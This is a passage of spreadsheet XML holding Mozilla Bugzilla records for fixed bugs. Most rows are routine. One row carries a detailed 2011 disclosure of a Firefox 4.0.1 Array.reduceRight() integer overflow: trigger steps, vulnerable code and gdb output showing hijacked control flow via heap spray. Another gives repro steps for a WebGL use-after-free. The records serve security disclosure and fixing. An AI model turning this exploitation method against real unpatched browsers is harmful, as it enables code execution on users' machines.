      <c r="N3126" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3126" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3126" t="inlineStr">
        <is>
          <t>[sg:high] maybe critical if plugins can write to disk when loaded locally</t>
        </is>
      </c>
      <c r="Q3126" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3126" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3126" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3126" t="n">
        <v>1</v>
      </c>
      <c r="U3126" t="n">
        <v>0</v>
      </c>
      <c r="V3126" t="n">
        <v>25</v>
      </c>
      <c r="W3126" t="inlineStr">
        <is>
          <t>In bug 534362 and bug 492713, we removed some code protecting the location object (on both the document and the window) because it isn't needed anymore for either web content or extensions (web pages are allowed to confuse themselves to their heart's content). In doing this, we forgot that plugins also use location.href to figure out what page they've been embedded in.
The real fix for this bug would be to provide an API in NPAPI to allow plugins to figure out where they are, but in the meantime, we need to re-overprotect the location object.</t>
        </is>
      </c>
      <c r="X3126" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3127">
      <c r="A3127" t="n">
        <v>468009</v>
      </c>
      <c r="B3127" t="inlineStr">
        <is>
          <t>2008-12-04 18:05:06 -0800</t>
        </is>
      </c>
      <c r="C3127" t="inlineStr">
        <is>
          <t>SOAP::Lite versions greater than 0.68 and less than 0.710.06 return the wrong XML for methods</t>
        </is>
      </c>
      <c r="D3127" t="inlineStr">
        <is>
          <t>2008-12-06 11:59:04 -0800</t>
        </is>
      </c>
      <c r="E3127" t="n">
        <v>1</v>
      </c>
      <c r="F3127" t="n">
        <v>1</v>
      </c>
      <c r="G3127" t="n">
        <v>4</v>
      </c>
      <c r="H3127" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3127" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3127" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K3127" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="L3127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3127" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3127" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3127" t="inlineStr"/>
      <c r="Q3127" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3127" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3127" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T3127" t="n">
        <v>1</v>
      </c>
      <c r="U3127" t="n">
        <v>0</v>
      </c>
      <c r="V3127" t="n">
        <v>6</v>
      </c>
      <c r="W3127" t="inlineStr">
        <is>
          <t>I knew this bug existed, but I didn't know what versions were affected until just now. If you are using a bad version of SOAP::Lite (greater than 0.68 but before 0.710.06), then you get things like &lt;get_bugsResponse&gt; instead of &lt;methodResponse&gt; in the XML returned from method calls. Some SOAP clients might be OK with this, but I suspect that most (if not all) will actually break in this case, so we need to blacklist those SOAP::Lite versions.</t>
        </is>
      </c>
      <c r="X3127" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3128">
      <c r="A3128" t="n">
        <v>674420</v>
      </c>
      <c r="B3128" t="inlineStr">
        <is>
          <t>2011-07-26 16:44:47 -0700</t>
        </is>
      </c>
      <c r="C3128" t="inlineStr">
        <is>
          <t>500 Internal Server on search URLs without parameters to ?query</t>
        </is>
      </c>
      <c r="D3128" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E3128" t="n">
        <v>1</v>
      </c>
      <c r="F3128" t="n">
        <v>1</v>
      </c>
      <c r="G3128" t="n">
        <v>4</v>
      </c>
      <c r="H3128" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3128" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3128" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3128" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3128" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3128" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3128" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3128" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3128" t="inlineStr"/>
      <c r="Q3128" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3128" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3128" t="inlineStr">
        <is>
          <t>2.1</t>
        </is>
      </c>
      <c r="T3128" t="n">
        <v>1</v>
      </c>
      <c r="U3128" t="n">
        <v>0</v>
      </c>
      <c r="V3128" t="n">
        <v>5</v>
      </c>
      <c r="W3128" t="inlineStr">
        <is>
          <t>This probably shouldn't block 2.1, but malformed search URLs (https://crash-stats-dev.allizom.org/query/query?build_id=on&amp;do_query=1&amp;query_search=signature&amp;hang_type=hang&amp;query_type=on&amp;product=on&amp;process_type=plugin&amp;platform=on&amp;reason=on&amp;version=on&amp;range_unit=on&amp;date=07/26/2011&amp;query) still throw 500 Internal Server Errors, like so:
[16:41:49.157] GET https://crash-stats-dev.allizom.org/query/query?build_id=on&amp;do_query=1&amp;query_search=signature&amp;hang_type=hang&amp;query_type=on&amp;product=on&amp;process_type=plugin&amp;platform=on&amp;reason=on&amp;version=on&amp;range_unit=on&amp;date=07/26/2011&amp;query [HTTP/1.1 500 Internal Server Error 413ms]
The URLs were culled from https://bugzilla.mozilla.org/show_bug.cgi?id=669965#c5 and https://bugzilla.mozilla.org/show_bug.cgi?id=669965#c11; looks like they're missing the parameter to ?query=</t>
        </is>
      </c>
      <c r="X3128" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3129">
      <c r="A3129" t="n">
        <v>664009</v>
      </c>
      <c r="B3129" t="inlineStr">
        <is>
          <t>2011-06-13 16:06:09 -0700</t>
        </is>
      </c>
      <c r="C3129" t="inlineStr">
        <is>
          <t>Array.reduceRight() info leak and potential code execution</t>
        </is>
      </c>
      <c r="D3129" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:57 -0700</t>
        </is>
      </c>
      <c r="E3129" t="n">
        <v>1</v>
      </c>
      <c r="F3129" t="n">
        <v>1</v>
      </c>
      <c r="G3129" t="n">
        <v>3</v>
      </c>
      <c r="H3129" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3129" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3129" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3129" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3129" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3129" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3129" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3129" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3129" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3129" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3129" t="n">
        <v>1</v>
      </c>
      <c r="U3129" t="n">
        <v>0</v>
      </c>
      <c r="V3129" t="n">
        <v>18</v>
      </c>
      <c r="W3129" t="inlineStr">
        <is>
          <t>Created attachment 539035
ruby server PoC
Chris Rohlf and Yan Ivnitskiy are giving a talk at BlackHat 2011 on the security risks of JIT engines.
https://www.blackhat.com/html/bh-us-11/bh-us-11-briefings.html#Rohlf
The have provided a Ruby Sinatra server PoC and the following details:
=begin
Mozilla Firefox 4.0.1 Array.reduceRight() Vulnerability
Firefox 4.0.1 contains an integer overflow that can lead to an information leak
and arbitrary code execution.
Quick Reproduction Steps:
1. Create an Array object
2. Set Array object length to MAX_UINT-1
3. Call reduceRight(Function()) on new Array
When the reduceRight method is called on an Array object instance execution
transferred to array_extra() in jsarray.cpp. This function first determines
if the argument passed to the method is a callable object (such as a function)
that will be called for each element of the array. If this test passes then
the following code is executed:
1. line 2740 jsarray.cpp reads in the Array.length property to an unsigned
   integer: 
    ...
    jsuint length;
    if (!js_GetLengthProperty(cx, obj, &amp;length))
        return JS_FALSE;
    ...
2. line 2767 jsarray.cpp start, end and step are initialized but reversed
   if the method called is reduceRight(). These variables are all signed integers
    ...
    jsint start = 0, end = length, step = 1;
    switch (mode) {
      case REDUCE_RIGHT:
        start = length - 1, end = -1, step = -1;
    ...
3. A call to GetElement is made on line 2784. Below is the function prototype
   for the GetElement function:
    ...
    GetElement(JSContext *cx, JSObject *obj, jsdouble index, JSBool *hole, Value *vp)
    ...
    This first call to GetElement can be avoided by providing &gt;= 2 arguments
    to the reduceRight() call.
    The call to GetElement on line 2839 is the call we want to reach. This call
    lies within a giant for loop that iterates over each element of the array
    calling the Javascript callback provided as the first argument to reduceRight()
4. Now that a controllable signed index value is passed into GetElement
   the following if statement is executed:
    ...
    JS_ASSERT(index &gt;= 0); // &lt;- NOT EXECUTED UNLESS DEBUG BUILD
    if (obj-&gt;isDenseArray() &amp;&amp; index &lt; obj-&gt;getDenseArrayCapacity() &amp;&amp;
        !(*vp = obj-&gt;getDenseArrayElement(uint32(index))).isMagic(JS_ARRAY_HOLE)) {
        *hole = JS_FALSE;
        return JS_TRUE;
    }
    ...
    - The call to obj-&gt;isDenseArray() should succeed.
    - The return value of obj-&gt;getDenseArrayCapacity() should return 16
    - The call to '*vp = obj-&gt;getDenseArrayElement(uint32(index))).isMagic(JS_ARRAY_HOLE)'
      boils down to a call to getSlot(index) on line 334 of jsobjinlines.h
      This getSlot(index) call is on 686 of jsobj.h basically executes:
        obj-&gt;slots[attacker_controlled_index]
    - The *vp pointer now points out of bounds from the obj-&gt;slots array. If this
      doesn't point to a mapped page then the process will crash. If the page is
      mapped then we read this value and return it as the value of that location
      in the array.
    - *vp is actually a Value class instance which contains a jsval_layout union, which
      means our leaked Value may be interpreted as an Integer, String or Object value.
    Continuing down the vulnerable code path...
    5. Back in array_extra() the following code is executed
    ...
    for (jsint i = start; i != end; i += step) {
        JSBool hole;
        ok = JS_CHECK_OPERATION_LIMIT(cx) &amp;&amp;
            GetElement(cx, obj, i, &amp;hole, tvr.addr()); // line 2839 of jsarray.cpp (shown in #4)
    ...
        uintN argi = 0;
        if (REDUCE_MODE(mode))              // setup the arguments to reduceRight()
            session[argi++] = *vp;          // prev
        session[argi++] = tvr.value();      // current (our information leak)
        session[argi++] = Int32Value(i);    // index
        session[argi]   = objv;             // array
        /* Do the call. */
        ok = session.invoke(cx);            // invoke the javascript callback
    ...
    - So now in our reduceRight() callback function we have a leaked value (current)
    - Code execution is possible via heap spray. We simply spray a bunch of fake
      Value's tagged as type JSVAL_TYPE_OBJECT and control their asPtr and ptr members
      which will lead to all sorts of exploitable conditions.
Below is a working ruby Sinatra server that will demonstrate a reliable information leak and
somewhat reliable code execution.
When run under 32bit linux this POC should leak many libxul pointers stored just beneath
the obj-&gt;slots[] array in memory. Heres the output of GDB that proves code execution is possible.
Once the Value is controlled by the attacker in the reduceRight callback we trigger a method
off the object such as setting an element and execution is transferred to the JIT'd SetElem
method which calls obj-&gt;setProperty()
(gdb) bt 5
#0  0x070c0c0c in ?? ()
#1  0x01e76af4 in setProperty (f=...) at /builds/slave/rel-2.0-lnx-bld/build/js/src/jsobj.h:1232
#2  js::mjit::stubs::SetElem&lt;0&gt; (f=...)
    at /builds/slave/rel-2.0-lnx-bld/build/js/src/methodjit/StubCalls.cpp:567
#3  0x08cf3b4a in ?? ()
#4  0x01daf61a in js::mjit::EnterMethodJIT (cx=0xb1178680, fp=0xb2eff0c0, code=0x8cf3a10, 
    stackLimit=0xb2f8baf0) at /builds/slave/rel-2.0-lnx-bld/build/js/src/methodjit/MethodJIT.cpp:749
(More stack frames follow...)
(gdb) i r
eax            0xb1178680   -1323858304
ecx            0x1  1
edx            0x70c0c0c    118230028
ebx            0x22827b4    36186036
esp            0xbfe67e6c   0xbfe67e6c
ebp            0xbfe67ec0   0xbfe67ec0
esi            0xb2eff108   -1292898040
edi            0xc0c0c0c    202116108
eip            0x70c0c0c    0x70c0c0c
eflags         0x210206 [ PF IF RF ID ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
Disassembly of SetElement once edx is controlled:
0x1e76ac8 &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+152&gt;:   mov    0x64(%edx),%edx &lt;- edx = 0x0c0c0c0c
0x1e76acb &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+155&gt;:   test   %edx,%edx       &lt;- edx = 0x070c0c0c 
0x1e76acd &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+157&gt;:   je     0x1e76b88 &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+344&gt;
0x1e76ad3 &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+163&gt;:   lea    0x28(%esp),%eax
0x1e76ad7 &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+167&gt;:   mov    %eax,0xc(%esp)
0x1e76adb &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+171&gt;:   mov    0x20(%esp),%eax
0x1e76adf &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+175&gt;:   movl   $0x0,0x10(%esp)
0x1e76ae7 &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+183&gt;:   mov    %ecx,0x8(%esp)
0x1e76aeb &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+187&gt;:   mov    %edi,0x4(%esp)
0x1e76aef &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+191&gt;:   mov    %eax,(%esp)
0x1e76af2 &lt;js::mjit::stubs::SetElem&lt;0&gt;(js::VMFrame&amp;)+194&gt;:   call   *%edx    &lt;- call 0x070c0c0c (setProperty)
This vulnerability was discovered and researched by Chris Rohlf of Matasano Security.
** This has only been tested on 32bit Ubuntu 11.04 with Firefox 4.0.1 **
=end</t>
        </is>
      </c>
      <c r="X3129" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3130">
      <c r="A3130" t="n">
        <v>825616</v>
      </c>
      <c r="B3130" t="inlineStr">
        <is>
          <t>2012-12-31 08:48:10 -0800</t>
        </is>
      </c>
      <c r="C3130" t="inlineStr">
        <is>
          <t>Change WikiDocumentVisits to use Google Analytics</t>
        </is>
      </c>
      <c r="D3130" t="inlineStr">
        <is>
          <t>2013-02-07 12:00:02 -0800</t>
        </is>
      </c>
      <c r="E3130" t="n">
        <v>1</v>
      </c>
      <c r="F3130" t="n">
        <v>1</v>
      </c>
      <c r="G3130" t="n">
        <v>5</v>
      </c>
      <c r="H3130" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3130" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3130" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3130" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3130" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3130" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3130" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3130" t="inlineStr">
        <is>
          <t>u=dev c=metrics p=2 s=2013.1</t>
        </is>
      </c>
      <c r="Q3130" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3130" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3130" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T3130" t="n">
        <v>1</v>
      </c>
      <c r="U3130" t="n">
        <v>0</v>
      </c>
      <c r="V3130" t="n">
        <v>5</v>
      </c>
      <c r="W3130" t="inlineStr">
        <is>
          <t>We currently pull in KB document visits for all en-US documents from Webtrends. This data is used for sorting and prioritizing in the KB/L10n dashboards. We need to switch it to use Google Analytics. Most of the code lives at dashboards.models.WikiDocumentVisits.</t>
        </is>
      </c>
      <c r="X3130" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3131">
      <c r="A3131" t="n">
        <v>661038</v>
      </c>
      <c r="B3131" t="inlineStr">
        <is>
          <t>2011-05-31 16:19:07 -0700</t>
        </is>
      </c>
      <c r="C3131" t="inlineStr">
        <is>
          <t>'rm: WARNING: Circular directory structure' on w32-ix-slave32</t>
        </is>
      </c>
      <c r="D3131" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3131" t="n">
        <v>1</v>
      </c>
      <c r="F3131" t="n">
        <v>1</v>
      </c>
      <c r="G3131" t="n">
        <v>5</v>
      </c>
      <c r="H3131" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3131" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3131" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3131" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3131" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3131" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N3131" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3131" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3131" t="inlineStr"/>
      <c r="Q3131" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3131" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3131" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3131" t="n">
        <v>1</v>
      </c>
      <c r="U3131" t="n">
        <v>0</v>
      </c>
      <c r="V3131" t="n">
        <v>2</v>
      </c>
      <c r="W3131" t="inlineStr">
        <is>
          <t>During a mozilla-central debug build, in 'make package-tests':
rm -rf ./dist/test-package-stage &amp;&amp; e:/builds/moz2_slave/cen-w32-dbg/build/obj-firefox/config/nsinstall.exe -D ./dist/test-package-stage &amp;&amp; e:/builds/moz2_slave/cen-w32-dbg/build/obj-firefox/config/nsinstall.exe -D ./dist/test-package-stage/bin &amp;&amp; e:/builds/moz2_slave/cen-w32-dbg/build/obj-firefox/config/nsinstall.exe -D ./dist/test-package-stage/bin/components &amp;&amp; e:/builds/moz2_slave/cen-w32-dbg/build/obj-firefox/config/nsinstall.exe -D ./dist/test-package-stage/certs &amp;&amp; e:/builds/moz2_slave/cen-w32-dbg/build/obj-firefox/config/nsinstall.exe -D ./dist/test-package-stage/jetpack &amp;&amp; e:/builds/moz2_slave/cen-w32-dbg/build/obj-firefox/config/nsinstall.exe -D ./dist/test-package-stage/firebug
rm: WARNING: Circular directory structure.
This almost certainly means that you have a corrupted file system.
NOTIFY YOUR SYSTEM MANAGER.
The following directory is part of the cycle:
  `./dist/test-package-stage/mozmill/virtualenv'
make: *** [make-stage-dir] Error 1
program finished with exit code 2
Clobbering cen-w32-dbg manually ....</t>
        </is>
      </c>
      <c r="X3131" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3132">
      <c r="A3132" t="n">
        <v>1749292</v>
      </c>
      <c r="B3132" t="inlineStr">
        <is>
          <t>2022-01-10 05:05:56 -0800</t>
        </is>
      </c>
      <c r="C3132" t="inlineStr">
        <is>
          <t>Use-after-free in mozilla::gl::GLContext::raw_fDrawElementsInstanced</t>
        </is>
      </c>
      <c r="D3132" t="inlineStr">
        <is>
          <t>2024-09-15 23:55:40 -0700</t>
        </is>
      </c>
      <c r="E3132" t="n">
        <v>1</v>
      </c>
      <c r="F3132" t="n">
        <v>1</v>
      </c>
      <c r="G3132" t="n">
        <v>3</v>
      </c>
      <c r="H3132" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3132" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3132" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3132" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3132" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3132" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3132" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3132" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3132" t="inlineStr">
        <is>
          <t>[fixed by bug 1768190][bugmon:bisected,confirmed][adv-esr102.6+]</t>
        </is>
      </c>
      <c r="Q3132" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3132" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3132" t="inlineStr">
        <is>
          <t>105 Branch</t>
        </is>
      </c>
      <c r="T3132" t="n">
        <v>1</v>
      </c>
      <c r="U3132" t="n">
        <v>0</v>
      </c>
      <c r="V3132" t="n">
        <v>26</v>
      </c>
      <c r="W3132" t="inlineStr">
        <is>
          <t>Created attachment 9258310
heap-use-after-free-interceptormemcpy-GLContextrawfDrawElementsInstanced.zip
Tested on:
    OS: Ubuntu 20.04 running in VMware Workstation 16 VM.
    Firefox: Downloaded with fuzzfetch
    ```
    fuzzfetch --target firefox --os Linux --asan --fuzzing -n firefox   
    ```
    ```
   [2022-01-10 04:29:30] Identified task: https://firefox-ci-tc.services.mozilla.com/api/index/v1/task/gecko.v2.mozilla-central.latest.firefox.linux64-fuzzing-asan-opt
    [2022-01-10 04:29:30] &gt; Task ID: Mm64vHQPRmii0o0Mq2DOHQ
    [2022-01-10 04:29:30] &gt; Rank: 1641807422
    [2022-01-10 04:29:30] &gt; Changeset: b81970e39db444fa9a70eaf2e656f3e48c18a7c1
    [2022-01-10 04:29:30] &gt; Build ID: 20220110093702
    [2022-01-10 04:29:32] &gt; Downloading: https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/Mm64vHQPRmii0o0Mq2DOHQ/artifacts/public/build/target.tar.bz2
    ```
I couldn't reproduce the issue with debug build. I think there is some race condition that is not reachable with my laptop and debug build.
Sorry for the complex test case, but reducing it any further caused the test case to go unrealiable.
The test case is based on WebGL 2.0.0 conformance-suite gles3 frameblitter test(https://github.com/KhronosGroup/WebGL/blob/main/conformance-suites/2.0.0/deqp/functional/gles3/framebufferblit/default_framebuffer_02.html ) 
and requires group of files from the test suite.  I have added all the required files to the attached .zip. Same files are included in the Firefox source checkout in /dom/canvas/test/webgl-conf/checkout/deqp/. As reproducing additionally requires a custom http-server, I thought that it would be easier to include all the files in a single .zip.
.zip includes:
    20220110-044334_ffp_logs_cu0dh2z3: ffpuppet logs
    deqp: required test files
    goog: Google Closure library used by the conformance test suite
    js  : Additional js files from the test suite
    firefox-ffpuppet-run.log: ffpuppet stdout/stderr
    heap-use-after-free-interceptormemcpy0.html: The repro-file
    prefs.js: Firefox prefs.js file, not required, but included to ensure reproducability
    report.txt: This file
    repro-server.py: python server that serves included files via http and 'no-cache'  
On my machine the issue has reproduced reliably, but requires firefox to be run with xvfb.
You can find ffpuppet run log from the attached .zip file.
Reproducing:
```
# 0. cd to the folder extracted from the zip
# 1. Start python server
python repro-server.py 8000 &amp;
# 2. Run firefox with ffpuppet and included prefs.js
ffpuppet ~/Downloads/firefox/firefox -u http://localhost:8000/heap-use-after-free-interceptormemcpy0.html -p ./prefs.js --xvfb -d
# 3. Wait. On my laptop the issue reproduced typically in ~23s, or multiple of 23s, but under 2min.
```
ASAN-trace:
```
==1162948==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200026ee40 at pc 0x55e691fc1354 bp 0x7fff2e8fff00 sp 0x7fff2e8ff6c0
READ of size 64 at 0x61200026ee40 thread T0 (Isolated Web Co)
    #0 0x55e691fc1353 in __interceptor_memcpy /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:827:5
    #1 0x7fc24cf54554  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x811554)
    #2 0x7fc24cf54aa9  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x811aa9)
    #3 0x7fc24cf54ec9  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x811ec9)
    #4 0x7fc24cf55746  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x812746)
    #5 0x7fc24cf6dc3a  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x82ac3a)
    #6 0x7fc24c90e768  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x1cb768)
    #7 0x7fc24c90d225  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x1ca225)
    #8 0x7fc24c8f84a9  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x1b54a9)
    #9 0x7fc24c9d7c58  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x294c58)
    #10 0x7fc24c9d8f46  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x295f46)
    #11 0x7fc26a28289f in mozilla::gl::GLContext::raw_fDrawElementsInstanced(unsigned int, int, unsigned int, void const*, int) /builds/worker/checkouts/gecko/gfx/gl/GLContext.h:2521:5
    #12 0x7fc26a271b98 in mozilla::gl::GLContext::fDrawElementsInstanced(unsigned int, int, unsigned int, void const*, int) /builds/worker/checkouts/gecko/gfx/gl/GLContext.h:2504:5
    #13 0x7fc26a271478 in mozilla::WebGLContext::DrawElementsInstanced(unsigned int, int, unsigned int, long, int)
...
0x61200026ee40 is located 0 bytes inside of 268-byte region [0x61200026ee40,0x61200026ef4c)
freed by thread T0 (Isolated Web Co) here:
    #0 0x55e6920254c2 in __interceptor_free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:111:3
    #1 0x7fc24c94f55f  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x20c55f)
previously allocated by thread T0 (Isolated Web Co) here:
    #0 0x55e692026197 in __interceptor_posix_memalign /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:210:3
    #1 0x7fc24c94f63d  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x20c63d)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:827:5 in __interceptor_memcpy
```</t>
        </is>
      </c>
      <c r="X3132" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3133">
      <c r="A3133" t="n">
        <v>897678</v>
      </c>
      <c r="B3133" t="inlineStr">
        <is>
          <t>2013-07-24 14:09:37 -0700</t>
        </is>
      </c>
      <c r="C3133" t="inlineStr">
        <is>
          <t>ASAN SEGV on unknown address in Worker::SetEventListener</t>
        </is>
      </c>
      <c r="D3133" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:33 -0800</t>
        </is>
      </c>
      <c r="E3133" t="n">
        <v>1</v>
      </c>
      <c r="F3133" t="n">
        <v>1</v>
      </c>
      <c r="G3133" t="n">
        <v>3</v>
      </c>
      <c r="H3133" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3133" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3133" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3133" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3133" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3133" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3133" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3133" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3133" t="inlineStr">
        <is>
          <t>[dupe 831090?][adv-main25+][adv-esr1710+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q3133" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3133" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3133" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T3133" t="n">
        <v>1</v>
      </c>
      <c r="U3133" t="n">
        <v>0</v>
      </c>
      <c r="V3133" t="n">
        <v>65</v>
      </c>
